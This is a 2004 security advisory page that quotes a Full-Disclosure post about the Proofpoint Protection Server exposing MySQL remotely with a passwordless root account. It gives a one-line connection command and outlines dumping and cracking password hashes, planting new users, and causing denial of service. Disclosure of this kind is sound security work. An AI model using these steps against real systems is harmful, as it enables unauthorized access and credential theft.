Proofpoint Protection Server Grants Remote Users Access to the Underlying Database
SecurityTracker Alert ID: 1009175|
SecurityTracker URL: http://securitytracker.com/id/1009175
(Links to External Site)
Date: Feb 23 2004
User access via network|
Exploit Included: Yes |
A vulnerability was reported in the Proofpoint Protection Server. A remote user can gain access to the underlying database server.|
It is reported that by default, the system configures the included the MySQL database to listen on TCP port 3306 and does not set any password for the 'root' account. A remote user can connect to the database as the 'root' user. This level of privileges allows the remote user to execute INSERT and DELETE commands and to view the contents of the database, the report said.
A remote user can access the underlying database and can view the database contents and add new user accounts.|
No solution was available at the time of this entry.|
Vendor URL: www.proofpoint.com/product-mps/overview.php (Links to External Site)
Linux (Red Hat Linux)|
Source Message Contents
Date: Sat, 21 Feb 2004 19:09:10 -0800|
Subject: [Full-Disclosure] Proofpoint Protection Server remote MySQL root user vulnerability
Product: Protection Server
Version: unknown/Red Hat Linux
The MySQL server may be remotely access by the "root" user without using
The Proofpoint Protection Server is a software product to filter spam
and other e-mail traffic. It's installed on Red Hat Linux. A partial
customer list may be found on their website.
By default, the embedded MySQL 4.0 server binds to the default port (3306/tcp)
on every IP. The software has no packet filtering or port restrictions
of it's own, so all bound ports are wide open to the network.
The specific flaw is that the "root" user in MySQL is not restricted
from connecting from any host ('%') and additionally the root user HAS
NO PASSWORD. There are a few minor restrictions on the root user when
logging in from a remote host, such as no Reload_priv (more on this later),
but basic functions like INSERT and DELETE are allowed.
Exploiting this is as easy as
$ mysql -u root -h a.b.c.d
>From there you can view contents of the different databases, including
dumping the hashed passwords for any of the password-protected users.
You can then run one of the brute-force MySQL password hash crackers
against them (it's the old-style 16byte hashes).
It is also possible to create new users indirectly by INSERT'ing into
the user table for database mysql. Remote root will not be able to FLUSH
PRIVILEGES (required to make the user active--this is because no Reload_priv),
but if the database is restarted for any reason those users will become
active and able to authenticate. Remote root also has the ability to
More destructive operations were not tested due to the accidental nature
of discovery, but use your imagination (certainly a DoS is possible simply
by deleting users required by the system). Also since the systems are
running on Red Hat, it may be possible to exploit one of several recent
vulnerabilities in the Linux 2.4 kernel through MySQL.
Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2
Free, ultra-private instant messaging with Hush Messenger
Promote security and make money with the Hushmail Affiliate Program:
Full-Disclosure - We believe in it.